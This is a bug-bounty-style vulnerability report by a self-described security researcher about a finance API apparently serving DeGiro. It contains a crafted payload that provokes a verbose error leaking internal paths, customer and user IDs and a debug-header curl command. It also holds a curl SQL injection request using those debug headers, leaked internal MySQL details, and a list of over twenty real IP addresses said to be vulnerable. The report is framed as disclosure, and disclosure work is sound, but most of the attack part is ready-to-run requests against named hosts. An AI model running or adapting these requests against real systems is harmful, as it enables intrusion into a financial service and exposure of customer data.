Information leak by error message

Hi im security researcher! I found vulnerabilities in your websites. Here is my raport about bugs: # Information leak by error message Payload: ``` send: {"type":0,"data":["d|2",[[0,{"search":{"service":"security.__proto\u0000__","source":"SW","param":{"searchString":"wirtualna","quoteFilter":"COMPLETE","limit":25,"notExchangeId":[1006,1034],"securityGroupOrder":1,"searchArbitrageLogic":0,"searchExactInstrumentKey":1,"searchExactArbitrage":1,"searchSubstring":1,"searchFuzzy":1,"isHomeExchange":true,"languageIsoalpha2":"EN"}},"options":{"language":"EN"}}]]]} send: {"type":0,"data":["e|2",null]} recv: {"type":0,"data":["d|2",[[{"type":"PROGRAMMER_ERROR","code":500,"name":500,"message":"500 => {\"stack\":\"HTTPError: Response code 500 (Internal Server Error)\\n at EventEmitter.<anonymous> (/supervise/finance-api-3-server-3/node_modules/got/source/as-promise.js:74:19)\\n at runMicrotasks (<anonymous>)\\n at processTicksAndRejections (internal/process/task_queues.js:97:5)\",\"body\":\"Error(Error): A problem has occurred.\\n--------------------------------------------------------------------------------\\n\\nThe page that you requested is currently unavailable.\\n\\n- Press refresh or try again later.\\n\\n- In the case that you entered the requested URL manually please make \\n sure that the URL was entered correctly.\\n\\n- Press the \\\"back\\\" button off your browser in order to follow a different link.\\n\\n--------------------------------------------------------------------------------\\n\",\"code\":500,\"curl\":\"curl -ksS -H 'x-usfdebugsql: 1' -H 'x-usfpurge: 0' --data-raw 'version=1&source=SW&service=security.__proto%00__&auth=%7B%22moduleDirectoryName%22%3A%22DEGIRO%22%2C%22customerId%22%3A8149%2C%22userId%22%3A8520253%2C%22_userId%22%3A8520253%2C%22languageIsoalpha2%22%3A%22NL%22%2C%22vwdId%22%3Anull%2C%22pool%22%3Anull%7D&param=%7B%22searchString%22%3A%22wirtualna%22%2C%22quoteFilter%22%3A%22COMPLETE%22%2C%22limit%22%3A25%2C%22notExchangeId%22%3A%5B1006%2C1034%5D%2C%22securityGroupOrder%22%3A1%2C%22searchArbitrageLogic%22%3A0%2C%22searchExactInstrumentKey%22%3A1%2C%22searchExactArbitrage%22%3A1%2C%22searchSubstring%22%3A1%2C%22searchFuzzy%22%3A1%2C%22isHomeExchange%22%3A1%7D&fields=&languageIsoalpha2=EN' 'http://fapiv3.vwd-webtech.com:80/global/api/api.htn'\",\"headers\":{\"date\":\"Sun, 16 Aug 2020 18:45:40 GMT\",\"server\":\"Apache\",\"expires\":\"Sun, 16 Aug 2020 18:45:45 GMT\",\"vary\":\"Accept-Encoding,X-USF-Cookie\",\"x-powered-by\":\"USF-10/27/082/6\",\"x-usf-error\":\"Error\",\"cache-control\":\"max-age=5\",\"content-length\":\"489\",\"last-modified\":\"Sun, 16 Aug 2020 18:45:40 GMT\",\"content-type\":\"text/plain; charset=UTF-8\"},\"message\":\"Internal Server Error\"}","stackTrace":"500: 500 => {\"stack\":\"HTTPError: Response code 500 (Internal Server Error)\\n at EventEmitter.<anonymous> (/supervise/finance-api-3-server-3/node_modules/got/source/as-promise.js:74:19)\\n at runMicrotasks (<anonymous>)\\n at processTicksAndRejections (internal/process/task_queues.js:97:5)\",\"body\":\"Error(Error): A problem has occurred.\\n--------------------------------------------------------------------------------\\n\\nThe page that you requested is currently unavailable.\\n\\n- Press refresh or try again later.\\n\\n- In the case that you entered the requested URL manually please make \\n sure that the URL was entered correctly.\\n\\n- Press the \\\"back\\\" button off your browser in order to follow a different link.\\n\\n--------------------------------------------------------------------------------\\n\",\"code\":500,\"curl\":\"curl -ksS -H 'x-usfdebugsql: 1' -H 'x-usfpurge: 0' --data-raw 'version=1&source=SW&service=security.__proto%00__&auth=%7B%22moduleDirectoryName%22%3A%22DEGIRO%22%2C%22customerId%22%3A8149%2C%22userId%22%3A8520253%2C%22_userId%22%3A8520253%2C%22languageIsoalpha2%22%3A%22NL%22%2C%22vwdId%22%3Anull%2C%22pool%22%3Anull%7D&param=%7B%22searchString%22%3A%22wirtualna%22%2C%22quoteFilter%22%3A%22COMPLETE%22%2C%22limit%22%3A25%2C%22notExchangeId%22%3A%5B1006%2C1034%5D%2C%22securityGroupOrder%22%3A1%2C%22searchArbitrageLogic%22%3A0%2C%22searchExactInstrumentKey%22%3A1%2C%22searchExactArbitrage%22%3A1%2C%22searchSubstring%22%3A1%2C%22searchFuzzy%22%3A1%2C%22isHomeExchange%22%3A1%7D&fields=&languageIsoalpha2=EN' 'http://fapiv3.vwd-webtech.com:80/global/api/api.htn'\",\"headers\":{\"date\":\"Sun, 16 Aug 2020 18:45:40 GMT\",\"server\":\"Apache\",\"expires\":\"Sun, 16 Aug 2020 18:45:45 GMT\",\"vary\":\"Accept-Encoding,X-USF-Cookie\",\"x-powered-by\":\"USF-10/27/082/6\",\"x-usf-error\":\"Error\",\"cache-control\":\"max-age=5\",\"content-length\":\"489\",\"last-modified\":\"Sun, 16 Aug 2020 18:45:40 GMT\",\"content-type\":\"text/plain; charset=UTF-8\"},\"message\":\"Internal Server Error\"}\n at doHttp (/supervise/finance-api-3-server-3/node_modules/@vwd/finance-api-server/lib/handler/common/http.js:98:11)\n at runMicrotasks (<anonymous>)\n at processTicksAndRejections (internal/process/task_queues.js:97:5)"}]]]} recv: {"type":0,"data":["e|2",null]} ``` In error message i can see how to use 'internal api' with debug headers: ``` curl -ksS -H 'x-usfdebugsql: 1' -H 'x-usfpurge: 0' --data-raw '<payload>' http://fapiv3.vwd-webtech.com:80/global/api/api.htn ``` Vulnerable hosts: - http://128.127.11.37:80/primus # Sqlinjection Payload: ``` curl -i 'http://128.127.11.68:80/global/api/api.htn' -X POST \ -H 'X-USFDEBUGMEMCACHED: 1' \ -H 'X-USFDEBUGPARAM: 1' \ -H 'X-USFDEBUGOBJECTSQL: 1' \ -H 'X-USFDEBUGSQL: 1' \ --data-raw 'version=1&source=SW&service=security.search&auth=%7B%22moduleDirectoryName%22%3A+%22%22%2C+%22customerId%22%3A+0%2C+%22userId%22%3A+0%2C+%22_userId%22%3A+%221%22%2C+%22languageIsoalpha2%22%3A+%22NL%22%2C+%22vwdId%22%3A+null%2C+%22pool%22%3A+null%7D&param=%7B%22addCumulativeTurnover%22%3A+%220%22%2C+%22addVolume%22%3A+%221%22%2C+%22dateEnd%22%3A+%222020-08-13T23%3A59%3A59%22%2C+%22dateFormat%22%3A+%22UNIXTIME%22%2C+%22dateStart%22%3A+%222020-08-13T000000%22%2C+%22flatTableName%22%3A+%22shareSearch%22%2C+%22flatTableType%22%3A+%22INSTRUMENT%22%2C+%22instrumentId%22%3A+%2210555466%22%2C+%22intradayType%22%3A+%22LAST%22%2C+%22isin%22%3A+%22GB00BFZ45C84%22%2C+%22objectSQLObject%22%3A+%22USF2%3A%3ADATA%3A%3ASQL%22%2C+%22prefix%22%3A+%22%3Chere+sqlinjection%3E%23%22%2C+%22quoteType%22%3A+%22OHLC%22%2C+%22securityCategoryCode%22%3A+%22SHARE%22%2C+%22service%22%3A+%22security_slave%22%2C+%22timeAggregation%22%3A+%22daily%22%2C+%22widthAggregation%22%3A+%220%22%7D&fields=&languageIsoalpha2=EN' ``` I just leaked small info and then i stopped. Leaked info from sqlinjection: * mysql ip - `10.10.10.176` * mysql version - `5.6.46-86.2-log` Also `debug headers` should be *disabled* or available only from *internal network* Vulnerable hosts: - http://128.127.11.40:80/global/api/api.htn - http://128.127.11.41:80/global/api/api.htn - http://128.127.11.43:80/global/api/api.htn - http://128.127.11.45:80/global/api/api.htn - http://128.127.11.46:80/global/api/api.htn - http://128.127.11.47:80/global/api/api.htn - http://128.127.11.51:80/global/api/api.htn - http://128.127.11.52:80/global/api/api.htn - http://128.127.11.55:80/global/api/api.htn - http://128.127.11.56:80/global/api/api.htn - http://128.127.11.59:80/global/api/api.htn - http://128.127.11.60:80/global/api/api.htn - http://128.127.11.62:80/global/api/api.htn - http://128.127.11.63:80/global/api/api.htn - http://128.127.11.64:80/global/api/api.htn - http://128.127.11.65:80/global/api/api.htn - http://128.127.11.67:80/global/api/api.htn - http://128.127.11.68:80/global/api/api.htn - http://128.127.11.69:80/global/api/api.htn - http://128.127.11.70:80/global/api/api.htn - http://128.127.11.73:80/global/api/api.htn - http://128.127.11.82:80/global/api/api.htn - http://128.127.8.30:80/global/api/api.htn